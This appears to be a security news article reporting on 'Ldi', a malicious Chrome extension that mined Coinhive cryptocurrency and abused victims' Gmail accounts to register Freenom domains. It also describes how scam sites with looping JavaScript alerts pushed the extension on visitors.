With Chrome being the most widely used web browser, attackers are starting to develop more advanced and malicious extensions for it every day. Whether it's
impersonating popular extensions to deliver ads,
hijacking search queries, or
injecting the CoinHive browser miner, it is easy to see that malicious extensions are on the rise.
The extension we are going to look at today, called Ldi, takes it to the next level when it comes to malicious behavior. This is because it not only loads the Coinhive browser miner into a victim's browser and uses up all the CPU, but it also uses that victim's Gmail account to register free domains for the attackers using Freenom.
Promoted through scammy web sites
This extension was promoted through sites that displayed JavaScript alerts that continuously prompted you to install the extension. Though this site is no longer online, when a victim tried to close these alerts, the page would automatically open up the Chrome Web Store page for this extension. The Chrome Web Store page had little to no information and the description was "Wondering if your homepage is compatible with Mac? Check it with Ldi.". This extension has since been removed from the Chrome Web Store.
